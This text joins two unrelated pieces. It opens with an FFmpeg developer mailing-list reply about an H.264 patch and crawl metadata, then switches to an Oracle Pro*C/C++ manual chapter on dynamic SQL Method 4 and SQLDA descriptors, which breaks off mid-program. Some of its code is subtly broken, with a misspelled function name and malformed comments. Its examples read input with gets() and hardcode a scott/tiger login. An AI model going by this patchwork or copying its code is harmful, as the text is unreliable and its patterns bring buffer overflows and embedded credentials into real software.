Stefan Gehrer <stefan.gehrer at gmx.de> writes: > On 06/30/2010 10:54 PM, Jason Garrett-Glaser wrote: >> 2010/6/30 M?ns Rullg?rd<mans at mansr.com>: >>> J). >> >> Then we should do an ifdef of some sort to get optimal behavior in all >> situations. > > New patch, I realised that ff_h264_norm_shift_old is actually not in > use in H.264 but only ff_h264_norm_shift. > And I added a debatable #if > Stefan > > +#if HAVE_FAST_CLZ > + shift = 7 - av_log2(c->high); > +#else > + shift = ff_h264_norm_shift[c->high] - 1; > +#endif Remove this #if for now. We'll make it even better later. -- M?ns Rullg?rd mans at mansr.com
http://ffmpeg.org/pipermail/ffmpeg-devel/2010-June/092891.html
CC-MAIN-2014-23
refinedweb
105
79.87
This chapter shows you how to implement Oracle dynamic SQL Method 4, which lets your program accept or build dynamic SQL statements that contain a varying number of host variables. Use this to support existing applications. Use ANSI Dynamic SQL Method 4 for all new applications. Oracle Dynamic SQL Method 4 does not support object types, cursor variables, arrays of structs, DML returning clauses, Unicode variables, and LOBs. Use ANSI Dynamic SQL Method 4 instead. This chapter contains the following topics: Meeting the Special Requirements of Method 4 Using the SQLDA Variables A Closer Look at Each Step Example Program: Dynamic SQL Method 4 Sample Program : Dynamic SQL Method 4 using Scrollable Cursors Before looking into the requirements of Method 4, you should feel comfortable with the terms select-list item and placeholder. Select-list items are the columns or expressions following the keyword SELECT in a query. For example, the following dynamic query contains three select-list items: SELECT ename, job, sal + comm FROM emp WHERE deptno = 20 Placeholders are dummy bind variables that hold places in a SQL statement for actual bind variables. You do not declare placeholders, and can name them anything you like. Placeholders for bind variables are most often used in the SET, VALUES, and WHERE clauses. For example, the following dynamic SQL statements each contain two placeholders: INSERT INTO emp (empno, deptno) VALUES (:e, :d) DELETE FROM dept WHERE deptno = :num OR loc = :loc Unlike Methods 1, 2, and 3, dynamic SQL Method 4 lets your program Accept or build dynamic SQL statements that contain an unknown number of select-list items or placeholders, and Take explicit control over datatype conversion between Oracle and C types To add this flexibility to your program, you must give the Oracle runtime library additional information. The Pro*C/C++ Precompiler generates calls to Oracle for all executable dynamic SQL statements. If a dynamic SQL statement contains no select-list items or placeholders, Oracle needs no additional information to execute the statement. The following DELETE statement falls into this category: DELETE FROM emp WHERE deptno = 30 However, most dynamic SQL statements contain select-list items or placeholders for bind variables, as does the following UPDATE statement: UPDATE emp SET comm = :c WHERE empno = :e To execute a dynamic SQL statement that contains placeholders for bind variables or select-list items, Oracle needs information about the program variables that hold the input (bind) values, and that will hold the FETCHed values when a query is executed. The information needed by Oracle is: The number of bind variables and select-list items The length of each bind variable and select-list item The datatype of each bind variable and select-list item The address of each bind variable, and of the output variable that will receive each select-list item All the information Oracle needs about select-list items or placeholders for bind variables, except their values, is stored in a program data structure called the SQL Descriptor Area (SQLDA). The SQLDA struct is defined in the sqlda.h header file. Descriptions of select-list items are stored in a select descriptor, and descriptions of placeholders for bind variables are stored in a bind descriptor. The values of select-list items are stored in output variables; the values of bind variables are stored in input variables. You store the addresses of these variables in the select or bind SQLDA so that Oracle knows where to write output values and read input values. How do values get stored in these data variables? Output values are FETCHed using a cursor, and input values are typically filled in by the program, usually from information entered interactively by the user. The bind and select descriptors are usually referenced by pointer. A dynamic SQL program should declare a pointer to at least one bind descriptor, and a pointer to at least one select descriptor, in the following way: #include <sqlda.h> ... SQLDA *bind_dp; SQLDA *select_dp; You can then use the SQLSQLDAAlloc() function to allocate the descriptor, as follows: bind_dp = SQLSQLDAAlloc(runtime_context, size, name_length, ind_name_length); SQLSQLDAAlloc() was known as sqlaldt() before Oracle8. The constant SQL_SINGLE_RCTX is defined as (dvoid*)0. Use it for runtime_context when your application is single-threaded. You use the DESCRIBE statement to help obtain the information Oracle needs. The DESCRIBE SELECT LIST statement examines each select-list item to determine its name and name length. It then stores this information in the select SQLDA for your use. For example, you might use select-list names as column headings in a printout. The total number of select-list items is also stored in the SQLDA by DESCRIBE. The DESCRIBE BIND VARIABLES statement examines each placeholder to determine its name and length, then stores this information in an input buffer and bind SQLDA for your use. For example, you might use placeholder names to prompt the user for the values of bind variables. This section describes the SQLDA data structure in detail. You learn how to declare it, what variables it contains, how to initialize them, and how to use them in your program. Method 4 is required for dynamic SQL statements that contain an unknown number of select-list items or placeholders for bind variables. To process this kind of dynamic SQL statement, your program must explicitly declare SQLDAs, also called descriptors. Each descriptor is a struct which you must copy or code into your program. A select descriptor holds descriptions of select-list items, and the addresses of output buffers where the names and values of select-list items are stored. A bind descriptor holds descriptions of bind variables and indicator variables, and the addresses of input buffers where the names and values of bind variables and indicator variables are stored. If your program has more than one active dynamic SQL statement, each statement must have its own SQLDA(s). You can declare any number of SQLDAs with different names. For example, you might declare three select SQLDAs named sel_desc1, sel_desc2, and sel_desc3, so that you can FETCH from three concurrently OPEN cursors. However, non-concurrent cursors can reuse SQLDAs. To declare a SQLDA, include the sqlda.h header file. The contents of the SQLDA are: struct SQLDA { long N; /* Descriptor size in number of entries */ char **V; Ptr to Arr of addresses of main variables */ long *L; /* Ptr to Arr of lengths of buffers */ short *T; /* Ptr to Arr of types of buffers */ short **I; * Ptr to Arr of addresses of indicator vars */ long F; /* Number of variables found by DESCRIBE */ char **S; /* Ptr to Arr of variable name pointers */ short *M; /* Ptr to Arr of max lengths of var. names */ short *C; * Ptr to Arr of current lengths of var. names */ char **X; /* Ptr to Arr of ind. var. name pointers */ short *Y; /* Ptr to Arr of max lengths of ind. var. names */ short *Z; /* Ptr to Arr of cur lengths of ind. var. names */ }; After declaring a SQLDA, you allocate storage space for it with the SQLSQLDAAlloc() library function (known as sqlaldt() before Oracle8), using the syntax: descriptor_name = SQLSQLDAAlloc (runtime_context, max_vars, max_name, max_ind_name); where: Besides the descriptor, SQLSQLDAAlloc() allocates data buffers to which descriptor variables point. Figure 15-1 shows whether variables are set by SQLSQLDAAlloc() calls, DESCRIBE commands, FETCH commands, or program assignments. Figure 15-1 How Variables Are Set This section explains the purpose and use of each variable in the SQLDA. N specifies the maximum number of select-list items or placeholders that can be DESCRIBEd. Thus, N determines the number of elements in the descriptor arrays. Before issuing the optional DESCRIBE command, you must set N to the dimension of the descriptor arrays using the SQLSQLDAAlloc() library function. After the DESCRIBE, you must reset N to the actual number of variables DESCRIBEd, which is stored in the F variable. V is a pointer to an array of addresses of data buffers that store select-list or bind-variable values. When you allocate the descriptor, SQLSQLDAAlloc() zeros the elements V[0] through V[N - 1] in the array of addresses. For select descriptors, you must allocate data buffers and set this array before issuing the FETCH command. The statement EXEC SQL FETCH ... USING DESCRIPTOR ... directs Oracle to store FETCHed select-list values in the data buffers to which V[0] through V[N - 1] point. Oracle stores the ith select-list value in the data buffer to which V[i] points. For bind descriptors, you must set this array before issuing the OPEN command. The statement EXEC SQL OPEN ... USING DESCRIPTOR ... directs Oracle to execute the dynamic SQL statement using the bind-variable values to which V[0] through V[N - 1] point. Oracle finds the ith bind-variable value in the data buffer to which V[i ] points. L is a pointer to an array of lengths of select-list or bind-variable values stored in data buffers. For select descriptors, DESCRIBE SELECT LIST sets the array of lengths to the maximum expected for each select-list item. However, you might want to reset some lengths before issuing a FETCH command. FETCH returns at most n characters, where n is the value of L[i ] before the FETCH. The format of the length differs among Oracle datatypes. For CHAR or VARCHAR2 select-list items, DESCRIBE SELECT LIST sets L[i ] to the maximum length of the select-list item. For NUMBER select-list items, scale and precision are returned respectively in the low and next-higher bytes of the variable. You can use the library function SQLNumberPrecV6() to extract precision and scale values from L[i ]. See also "Extracting Precision and Scale ". You must reset L[i ] to the required length of the data buffer before the FETCH. For example, when coercing a NUMBER to a C char string, set L[i ] to the precision of the number plus two for the sign and decimal point. When coercing a NUMBER to a C float, set L[i ] to the length of floats on your system. For more information about the lengths of coerced datatypes, see also "Converting Data ". For bind descriptors, you must set the array of lengths before issuing the OPEN command. For example, you can use strlen() to get the lengths of bind-variable character strings entered by the user, then set the appropriate array elements. Because Oracle accesses a data buffer indirectly, using the address stored in V[i ], it does not know the length of the value in that buffer. If you want to change the length Oracle uses for the ith select-list or bind-variable value, reset L[i ] to the length you need. Each input or output buffer can have a different length. T is a pointer to an array of datatype codes of select-list or bind-variable values. These codes determine how Oracle data is converted when stored in the data buffers addressed by elements of the V array. For select descriptors, DESCRIBE SELECT LIST sets the array of datatype codes to the internal datatype (CHAR, NUMBER, or DATE, for example) of the items in the select list. Before FETCHing, you might want to reset some datatypes because the internal format of Oracle datatypes can be difficult to handle. For display purposes, it is usually a good idea to coerce the datatype of select-list values to VARCHAR2 or STRING. For calculations, you might want to coerce numbers from Oracle to C format. The high bit of T[i ] is set to indicate the NULL/not NULL status of the ith select-list item. You must always clear this bit before issuing an OPEN or FETCH command. You use the library function SQLColumnNullCheck() to retrieve the datatype code and clear the NULL/not NULL bit. You should change the Oracle NUMBER internal datatype to an external datatype compatible with that of the C data buffer to which V[i ] points. For bind descriptors, DESCRIBE BIND VARIABLES sets the array of datatype codes to zeros. You must set the datatype code stored in each element before issuing the OPEN command. The code represents the external (C) datatype of the data buffer to which V[i ] points. Often, bind-variable values are stored in character strings, so the datatype array elements are set to 1 (the VARCHAR2 datatype code). You can also use datatype code 5 (STRING). To change the datatype of the ith select-list or bind-variable value, reset T[i ] to the datatype you want. I is a pointer to an array of addresses of data buffers that store indicator-variable values. You must set the elements I[0] through I[N - 1] in the array of addresses. For select descriptors, you must set the array of addresses before issuing the FETCH command. When Oracle executes the statement EXEC SQL FETCH ... USING DESCRIPTOR ... if the ith returned select-list value is NULL, the indicator-variable value to which I[i ] points is set to -1. Otherwise, it is set to zero (the value is not NULL) or a positive integer (the value was truncated). For bind descriptors, you must set the array of addresses and associated indicator variables before issuing the OPEN command. When Oracle executes the statement EXEC SQL OPEN ... USING DESCRIPTOR ... the data buffer to which I[i ] points determines whether the ith bind variable has a NULL value. If the value of an indicator variable is -1, the value of its associated bind variable is NULL. F is the actual number of select-list items or placeholders found by DESCRIBE. F is set by DESCRIBE. If F is less than zero, DESCRIBE has found too many select-list items or placeholders for the allocated size of the descriptor. For example, if you set N to 10 but DESCRIBE finds 11 select-list items or placeholders, F is set to -11. This feature lets you dynamically reallocate a larger storage area for select-list items or placeholders if necessary. S is a pointer to an array of addresses of data buffers that store select-list or placeholder names as they appear in dynamic SQL statements. You use SQLSQLDAAlloc() to allocate the data buffers and store their addresses in the S array. DESCRIBE directs Oracle to store the name of the ith select-list item or placeholder in the data buffer to which S[i ] points. M is a pointer to an array of maximum lengths of data buffers that store select-list or placeholder names. The buffers are addressed by elements of the S array. When you allocate the descriptor, SQLSQLDAAlloc() sets the elements M[0] through M[N - 1] in the array of maximum lengths. When stored in the data buffer to which S[i ] points, the ith name is truncated to the length in M[i ] if necessary. C is a pointer to an array of current lengths of select-list or placeholder names. DESCRIBE sets the elements C[0] through C[N - 1] in the array of current lengths. After a DESCRIBE, the array contains the number of characters in each select-list or placeholder name. X is a pointer to an array of addresses of data buffers that store indicator-variable names. You can associate indicator-variable values with select-list items and bind variables. However, you can associate indicator-variable names only with bind variables. So, X applies only to bind descriptors. Use SQLSQLDAAlloc() to allocate the data buffers and store their addresses in the X array. DESCRIBE BIND VARIABLES directs Oracle to store the name of the ith indicator variable in the data buffer to which X[i ] points. Y is a pointer to an array of maximum lengths of data buffers that store indicator-variable names. Like X, Y applies only to bind descriptors. You use SQLSQLDAAlloc() to set the elements Y[0] through Y[N - 1] in the array of maximum lengths. When stored in the data buffer to which X[i ] points, the ith name is truncated to the length in Y[i ] if necessary. Z is a pointer to an array of current lengths of indicator-variable names. Like X and Y, Z applies only to bind descriptors. DESCRIBE BIND VARIABLES sets the elements Z[0] through Z[N - 1] in the array of current lengths. After a DESCRIBE, the array contains the number of characters in each indicator-variable name. You need a working knowledge of the following subjects to implement dynamic SQL Method 4: Handling NULL/Not NULL Datatypes This section provides more detail about the T (datatype) descriptor array. In host programs that use neither datatype equivalencing nor dynamic SQL Method 4, the conversion between Oracle internal and external datatypes is determined at precompile time. By default, the precompiler assigns a specific external datatype to each host variable in the Declare Section. For example, the precompiler assigns the INTEGER external datatype to host variables of type int. However, Method 4 lets you control data conversion and formatting. You specify conversions by setting datatype codes in the T descriptor array. Internal datatypes specify the formats used by Oracle to store column values in database tables, as well as the formats used to represent pseudocolumn values. When you issue a DESCRIBE SELECT LIST command, Oracle returns the internal datatype code for each select-list item to the T descriptor array. For example, the datatype code for the ith select-list item is returned to T[i ]. Table 15-1 shows the Oracle internal datatypes and their codes: External datatypes specify the formats used to store values in input and output host variables. The DESCRIBE BIND VARIABLES command sets the T array of datatype codes to zeros. So, you must reset the codes before issuing the OPEN command. The codes tell Oracle which external datatypes to expect for the various bind variables. For the ith bind variable, reset T[i ] to the external datatype you want. Table 15-2 shows the Oracle external datatypes and their codes, as well as the C datatype normally used with each external datatype. For a select descriptor, DESCRIBE SELECT LIST can return any of the Oracle internal datatypes. Often, as in the case of character data, the internal datatype corresponds exactly to the external datatype you want to use. However, a few internal datatypes map to external datatypes that can be difficult to handle. So, you might want to reset some elements in the T descriptor array. For example, you might want to reset NUMBER values to FLOAT values, which correspond to float values in C. Oracle does any necessary conversion between internal and external datatypes at FETCH time. So, be sure to reset the datatypes after the DESCRIBE SELECT LIST but before the FETCH. For a bind descriptor, DESCRIBE BIND VARIABLES does not return the datatypes of bind variables, only their number and names. Therefore, you must explicitly set the T array of datatype codes to tell Oracle the external datatype of each bind variable. Oracle does any necessary conversion between external and internal datatypes at OPEN time. When you reset datatype codes in the T descriptor array, you are "coercing datatypes." For example, to coerce the ith select-list value to STRING, you use the following statement: /* Coerce select-list value to STRING. */ select_des->T[i] = 5; When coercing a NUMBER select-list value to STRING for display purposes, you must also extract the precision and scale bytes of the value and use them to compute a maximum display length. Then, before the FETCH, you must reset the appropriate element of the L (length) descriptor array to tell Oracle the buffer length to use. For example, if DESCRIBE SELECT LIST finds that the ith select-list item is of type NUMBER, and you want to store the returned value in a C variable declared as float, simply set T[i ] to 4 and L[i ] to the length of floats on your system. The library function SQLNumberPrecV6() (previously known as sqlprc()) extracts precision and scale. Normally, it is used after the DESCRIBE SELECT LIST, and its first argument is L[i ]. You call SQLNumberPrecV6() using the following syntax: SQLNumberPrecV6(dvoid *runtime_context, int *length, int *precision, int *scale); where: When the scale is negative, add its absolute value to the length. For example, a precision of 3 and scale of -2 allow for numbers as large as 99900. The following example shows how SQLNumberPrecV6() is used to compute maximum display lengths for NUMBER values that will be coerced to STRING: /* Declare variables for the function call. */ sqlda *select_des; /* pointer to select descriptor */ int prec; /* precision */ int scal; /* scale */ extern void SQLNumberPrecV6(); /* Declare library function. */ /* Extract precision and scale. */ SQLNumberPrecV6(SQL_SINGLE_RCTX, &(select_des->L[i]), &prec, &scal); /* Allow for maximum size of NUMBER. */ if (prec == 0) prec = 38; /* Allow for possible decimal point and sign. */ select_des->L[i] = prec + 2; /* Allow for negative scale. */ if (scal < 0) select_des->L[i] += -scal; Notice that the first argument in this function call points to the ith element in the array of lengths, and that all three parameters are addresses. The SQLNumberPrecV6() function returns zero as the precision and scale values for certain SQL datatypes. The SQLNumberPrecV7() function is similar, having the same argument list, and returning the same values, except in the cases of these SQL datatypes: For every select-list column (not expression), DESCRIBE SELECT LIST returns a NULL/not NULL indication in the datatype array T of the select descriptor. If the ith select-list column is constrained to be not NULL, the high-order bit of T[i ] is clear; otherwise, it is set. Before using the datatype in an OPEN or FETCH statement, if the NULL/not NULL bit is set, you must clear it. (Never set the bit.) You can use the library function SQLColumnNullCheck() (previously was called sqlnul()) to find out if a column allows NULLs, and to clear the datatype's NULL/not NULL bit. You call SQLColumnNullCheck() using the syntax: SQLColumnNullCheck(dvoid *context, unsigned short *value_type, unsigned short *type_code, int *null_status); where: The following example shows how to use SQLColumnNullCheck(): /* Declare variables for the function call. */ sqlda *select_des; /* pointer to select descriptor */ unsigned short dtype; /* datatype without null bit */ int nullok; /* 1 = null, 0 = not null */ extern void SQLColumnNullCheck(); /* Declare library function. */ /* Find out whether column is not null. */ SQLColumnNUllCheck(SQL_SINGLE_RCTX, (unsigned short *)&(select_des->T[i]), &dtype, &nullok); if (nullok) { /* Nulls are allowed. */ ... /* Clear the null/not null bit. */ SQLColumnNullCheck(SQL_SINGLE_RCTX, &(select_des->T[i]), &(select_des->T[i]), &nullok); } Notice that the first and second arguments in the second call to the SQLColumnNullCheck() function point to the ith element in the array of datatypes, and that all three parameters are addresses. Method 4 can be used to process any dynamic SQL statement. In the coming example, a query is processed so you can see how both input and output host variables are handled. To process the dynamic query, our example program takes the following steps: Declare a host string in the Declare Section to hold the query text. Declare select and bind SQLDAs. Allocate storage space for the select and bind descriptors. Set the maximum number of select-list items and placeholders that can be DESCRIBEd. Put the query text in the host string. PREPARE the query from the host string. DECLARE a cursor FOR the query. DESCRIBE the bind variables INTO the bind descriptor. Reset the number of placeholders to the number actually found by DESCRIBE. Get values and allocate storage for the bind variables found by DESCRIBE. OPEN the cursor USING the bind descriptor. DESCRIBE the select list INTO the select descriptor. Reset the number of select-list items to the number actually found by DESCRIBE. Reset the length and datatype of each select-list item for display purposes. FETCH a row from the database INTO the allocated data buffers pointed to by the select descriptor. Process the select-list values returned by FETCH. Deallocate storage space used for the select-list items, placeholders, indicator variables, and descriptors. CLOSE the cursor. This section discusses each step in detail. At the end of this chapter is a Commented, full-length program illustrating Method 4. With Method 4, you use the following sequence of embedded SQL statements: EXEC SQL PREPARE statement_name FROM { :host_string | string_literal }; EXEC SQL DECLARE cursor_name CURSOR FOR statement_name; EXEC SQL DESCRIBE BIND VARIABLES FOR statement_name INTO bind_descriptor_name; EXEC SQL OPEN cursor_name [USING DESCRIPTOR bind_descriptor_name]; EXEC SQL DESCRIBE [SELECT LIST FOR] statement_name INTO select_descriptor_name; EXEC SQL FETCH cursor_name USING DESCRIPTOR select_descriptor_name; EXEC SQL CLOSE cursor_name; Scrollable cursors can also be used with Method 4. The following sequence of embedded SQL statements must be used for scrollable cursors. EXEC SQL PREPARE statement_name FROM { :host_string | string_literal }; EXEC SQL DECLARE cursor_name SCROLL CURSOR FOR statement_name; EXEC SQL DESCRIBE BIND VARIABLES FOR statement_name INTO bind_descriptor_name; EXEC SQL OPEN cusor_name [ USING DESCRIPTOR bind_descriptor_name]; EXEC SQL DESCRIBE [ SELECT LIST FOR] statement_name INTO select_descriptor_name; EXEC SQL FETCH [ FIRST| PRIOR|NEXT|LAST|CURRENT | RELATIVE fetch_offset |ABSOLUTE fetch_offset ] cursor_name USING DESCRIPTOR select_descriptor_name; EXEC SQL CLOSE cursor_name; If the number of select-list items in a dynamic query is known, you can omit DESCRIBE SELECT LIST and use the following Method 3 FETCH statement: EXEC SQL FETCH cursor_name INTO host_variable_list; Or, if the number of placeholders for bind variables in a dynamic SQL statement is known, you can omit DESCRIBE BIND VARIABLES and use the following Method 3 OPEN statement: EXEC SQL OPEN cursor_name [USING host_variable_list]; Next, you see how these statements allow your host program to accept and process a dynamic SQL statement using descriptors. Confine descriptor arrays to 3 elements Limit the maximum length of names to 5 characters Limit the maximum length of values to 10 characters Your program needs a host variable to store the text of the dynamic SQL statement. The host variable (select_stmt in our example) must be declared as a character string. ... int emp_number; VARCHAR emp_name[10]; VARCHAR select_stmt[120]; float bonus; In our example, instead of hardcoding the SQLDA data structure, you use INCLUDE to copy it into your program, as follows: #include <sqlda.h> Then, because the query might contain an unknown number of select-list items or placeholders for bind variables, you declare pointers to select and bind descriptors, as follows: sqlda *select_des; sqlda *bind_des; Recall that you allocate storage space for a descriptor with the SQLSQLDAAlloc() library function. The syntax, using ANSI C notation, is: SQLDA *SQLSQLDAAlloc(dvoid *context, unsigned int max_vars, unsigned int max_name, unsigned int max_ind_name); The SQLSQLDAAlloc() function allocates the descriptor structure and the arrays addressed by the pointer variables V, L, T, and I. If max_name is nonzero, arrays addressed by the pointer variables S, M, and C are allocated. If max_ind_name is nonzero, arrays addressed by the pointer variables X, Y, and Z are allocated. No space is allocated if max_name and max_ind_name are zero. If SQLSQLDAAlloc() succeeds, it returns a pointer to the structure. If SQLSQLDAAlloc() fails, it returns a zero. In our example, you allocate select and bind descriptors, as follows: select_des = SQLSQLDAAlloc(SQL_SINGLE_RCTX, 3, (size_t) 5, (size_t) 0); bind_des = SQLSQLDAAlloc(SQL_SINGLE_RCTX, 3, (size_t) 5, (size_t) 4); For select descriptors, always set max_ind_name to zero so that no space is allocated for the array addressed by X. Next, you set the maximum number of select-list items or placeholders that can be DESCRIBEd, as follows: select_des->N = 3; bind_des->N = 3; Figure 15-2 and Figure 15-3 represent the resulting descriptors. Figure 15-2 Initialized Select Descriptor Figure 15-3 Initialized Bind Descriptor Continuing our example, you prompt the user for a SQL statement, then store the input string in select_stmt, as follows: printf("\n\nEnter SQL statement: "); gets(select_stmt.arr); select_stmt.len = strlen(select_stmt.arr); We assume the user entered the following string: "SELECT ename, empno, comm FROM emp WHERE comm < :bonus" PREPARE parses the SQL statement and gives it a name. In our example, PREPARE parses the host string select_stmt and gives it the name sql_stmt, as follows: EXEC SQL PREPARE sql_stmt FROM :select_stmt; DECLARE CURSOR defines a cursor by giving it a name and associating it with a specific SELECT statement. To declare a cursor for static queries, you use the following syntax: EXEC SQL DECLARE cursor_name CURSOR FOR SELECT ... To declare a cursor for dynamic queries, the statement name given to the dynamic query by PREPARE is substituted for the static query. In our example, DECLARE CURSOR defines a cursor named emp_cursor and associates it with sql_stmt, as follows: EXEC SQL DECLARE emp_cursor CURSOR FOR sql_stmt; DESCRIBE BIND VARIABLES puts descriptions of placeholders into a bind descriptor. In our example, DESCRIBE readies bind_des, as follows: EXEC SQL DESCRIBE BIND VARIABLES FOR sql_stmt INTO bind_des; Note that bind_des must not be prefixed with a colon. The DESCRIBE BIND VARIABLES statement must follow the PREPARE statement but precede the OPEN statement. Figure 15-4 shows the bind descriptor in our example after the DESCRIBE. Notice that DESCRIBE has set F to the actual number of placeholders found in the processed SQL statement. Figure 15-4 Bind Descriptor after the DESCRIBE Next, you must reset the maximum number of placeholders to the number actually found by DESCRIBE, as follows: bind_des->N = bind_des->F; Your program must get values for the bind variables found in the SQL statement, and allocate memory for them. How the program gets the values is up to you. For example, they can be hardcoded, read from a file, or entered interactively. In our example, a value must be assigned to the bind variable that replaces the placeholder bonus in the query WHERE clause. So, you choose to prompt the user for the value, then process it as follows: for (i = 0; i < bind_des->F; i++) { printf("\nEnter value of bind variable %.*s:\n? ", (int) bind_des->C[i], bind_des->S[i]); gets(hostval); /* Set length of value. */ bind_des->L[i] = strlen(hostval); /* Allocate storage for value and null terminator. */ bind_des->V[i] = malloc(bind_des->L[i] + 1); /* Allocate storage for indicator value. */ bind_des->I[i] = (unsigned short *) malloc(sizeof(short)); /* Store value in bind descriptor. */ strcpy(bind_des->V[i], hostval); /* Set value of indicator variable. */ *(bind_des->I[i]) = 0; /* or -1 if "null" is the value */ /* Set datatype to STRING. */ bind_des->T[i] = 5; } Assuming that the user supplied a value of 625 for bonus, Figure 15-5 shows the resulting bind descriptor. Notice that the value is null-terminated. Figure 15-5 Bind Descriptor after Assigning Values The OPEN statement used for dynamic queries is like that used for static queries except that the cursor is associated with a bind descriptor. Values determined at run time and stored in buffers addressed by elements of the bind descriptor arrays are used to evaluate the SQL statement. With queries, the values are also used to identify the active set. In our example, OPEN associates emp_cursor with bind_des, as follows: EXEC SQL OPEN emp_cursor USING DESCRIPTOR bind_des; Remember, bind_des must not be prefixed with a colon. Then, OPEN executes the SQL statement. With queries, OPEN also identifies the active set and positions the cursor at the first row. If the dynamic SQL statement is a query, the DESCRIBE SELECT LIST statement must follow the OPEN statement but precede the FETCH statement. DESCRIBE SELECT LIST puts descriptions of select-list items in a select descriptor. In our example, DESCRIBE readies select_des, as follows: EXEC SQL DESCRIBE SELECT LIST FOR sql_stmt INTO select_des; Accessing the Oracle data dictionary, DESCRIBE sets the length and datatype of each select-list value. Figure 15-6 shows the select descriptor in our example after the DESCRIBE. Notice that DESCRIBE has set F to the actual number of items found in the query select list. If the SQL statement is not a query, F is set to zero. Also notice that the NUMBER lengths are not usable yet. For columns defined as NUMBER, you must use the library function SQLNumberPrecV6() to extract precision and scale. Figure 15-6 Select Descriptor after the DESCRIBE Next, you must reset the maximum number of select-list items to the number actually found by DESCRIBE, as follows: select_des->N = select_des->F; In our example, before FETCHing the select-list values, you allocate storage space for them using the library function malloc(). You also reset some elements in the length and datatype arrays for display purposes. for (i=0; i<select_des->F; i++) { /* Clear null bit. */ SQLColumnNullCheck(SQL_SINGLE_RCTX, (unsigned short *)&(select_des->T[i]), (unsigned short *)&(select_des->T[i]), &nullok); /* Reset length if necessary. */ switch(select_des->T[i]) { case 1: break; case 2: SQLNumberPrecV6(SQL_SINGLE_RCTX, (unsigned long *) &(select_des->L[i]), &prec, &scal); if (prec == 0) prec = 40; select_des->L[i] = prec + 2; if (scal < 0) select_des->L[i] += -scal; break; case 8: select_des->L[i] = 240; break; case 11: select_des->L[i] = 18; break; case 12: select_des->L[i] = 9; break; case 23: break; case 24: select_des->L[i] = 240; break; } /* Allocate storage for select-list value. */ select_des->V[i] = malloc(select_des->L[i]+1); /* Allocate storage for indicator value. */ select_des->I[i] = (short *)malloc(sizeof(short *)); /* Coerce all datatypes except LONG RAW to STRING. */ if (select_des->T[i] != 24) select_des->T[i] = 5; } Figure 15-7 shows the resulting select descriptor. Notice that the NUMBER lengths are now usable and that all the datatypes are STRING. The lengths in L[1] and L[2] are 6 and 9 because we increased the DESCRIBEd lengths of 4 and 7 by 2 to allow for a possible sign and decimal point. Figure 15-7 Select Descriptor before the FETCH FETCH returns a row from the active set, stores select-list values in the data buffers, and advances the cursor to the next row in the active set. If there are no more rows, FETCH sets sqlca.sqlcode to the "no data found" Oracle error code. In our example, FETCH returns the values of columns ENAME, EMPNO, and COMM to select_des, as follows: EXEC SQL FETCH emp_cursor USING DESCRIPTOR select_des; Figure 15-8 shows the select descriptor in our example after the FETCH. Notice that Oracle has stored the select-list and indicator values in the data buffers addressed by the elements of V and I. For output buffers of datatype 1, Oracle, using the lengths stored in the L array, left-justifies CHAR or VARCHAR2 data and right-justifies NUMBER data. For output buffer of type 5 (STRING), Oracle left-justifies and null terminates CHAR, VARCHAR2, and NUMBER data. The value 'MARTIN' was retrieved from a VARCHAR2(10) column in the EMP table. Using the length in L[0], Oracle left-justifies the value in a 10-byte field, filling the buffer. The value 7654 was retrieved from a NUMBER(4) column and coerced to '7654'. However, the length in L[1] was increased by 2 to allow for a possible sign and decimal point. So, Oracle left-justifies and null terminates the value in a 6-byte field. The value 482.50 was retrieved from a NUMBER(7,2) column and coerced to '482.50'. Again, the length in L[2] was increased by 2. So, Oracle left-justifies and null terminates the value in a 9-byte field. After the FETCH, your program can process the returned values. In our example, values for columns ENAME, EMPNO, and COMM are processed. Figure 15-8 Selected Descriptor after the FETCH You use the free() library function to deallocate the storage space allocated by malloc(). The syntax is as follows: free(char *pointer); In our example, you deallocate storage space for the values of the select-list items, bind variables, and indicator variables, as follows: for (i = 0; i < select_des->F; i++) /* for select descriptor */ { free(select_des->V[i]); free(select_des->I[i]); } for (i = 0; i < bind_des->F; i++) /* for bind descriptor */ { free(bind_des->V[i]); free(bind_des->I[i]); } You deallocate storage space for the descriptors themselves with the SQLSQLDAFree() library function, using the following syntax: SQLSQLDAFree(context, descriptor_name); The descriptor must have been allocated using SQLSQLDAAlloc(). Otherwise, the results are unpredictable. In our example, you deallocate storage space for the select and bind descriptors as follows: SQLSQLDAFree(SQL_SINGLE_RCTX, select_des); SQLSQLDAFree(SQL_SINGLE_RCTX, bind_des); CLOSE disables the cursor. In our example, CLOSE disables emp_cursor as follows: EXEC SQL CLOSE emp_cursor; To use input or output host arrays with Method 4, you must use the optional FOR clause to tell Oracle the size of your host array. You must set descriptor entries for the ith select-list item or bind variable using the syntax V[i] = array_address; L[i] = element_size; where array_address is the address of the host array, and element_size is the size of one array element. Then, you must use a FOR clause in the EXECUTE or FETCH statement (whichever is appropriate) to tell Oracle the number of array elements you want to process. This procedure is necessary because Oracle has no other way of knowing the size of your host array. In the complete program example later, three input host arrays are used to INSERT rows into the EMP table. EXECUTE can be used for Data Manipulation Language statements other than queries with Method 4. #include <stdio.h> #include <sqlcpr.h> #include <sqlda.h> #include <sqlca.h> #define NAME_SIZE 10 #define INAME_SIZE 10 #define ARRAY_SIZE 5 /* connect string */ char *username = "scott/tiger"; char *sql_stmt = "INSERT INTO emp (empno, ename, deptno) VALUES (:e, :n, :d)"; int array_size = ARRAY_SIZE; /* must have a host variable too */ SQLDA *binda; char names[ARRAY_SIZE][NAME_SIZE]; int numbers[ARRAY_SIZE], depts[ARRAY_SIZE]; /* Declare and initialize indicator vars. for empno and deptno columns */ short ind_empno[ARRAY_SIZE] = {0,0,0,0,0}; short ind_dept[ARRAY_SIZE] = {0,0,0,0,0}; main() { EXEC SQL WHENEVER SQLERROR GOTO sql_error; /* Connect */ EXEC SQL CONNECT :username; printf("Connected.\n"); /* Allocate the descriptors and set the N component. This must be done before the DESCRIBE. */ binda = SQLSQLDAAlloc(SQL_SINGLE_RCTX, 3, NAME_SIZE, INAME_SIZE); binda->N = 3; /* Prepare and describe the SQL statement. */ EXEC SQL PREPARE stmt FROM :sql_stmt; EXEC SQL DESCRIBE BIND VARIABLES FOR stmt INTO binda; /* Initialize the descriptors. */ binda->V[0] = (char *) numbers; binda->L[0] = (long) sizeof (int); binda->T[0] = 3; binda->I[0] = ind_empno; binda->V[1] = (char *) names; binda->L[1] = (long) NAME_SIZE; binda->T[1] = 1; binda->I[1] = (short *)0; binda->V[2] = (char *) depts; binda->L[2] = (long) sizeof (int); binda->T[2] = 3; binda->I[2] = ind_dept; /* Initialize the data buffers. */ strcpy(&names[0] [0], "ALLISON"); numbers[0] = 1014; depts[0] = 30; strcpy(&names[1] [0], "TRUSDALE"); 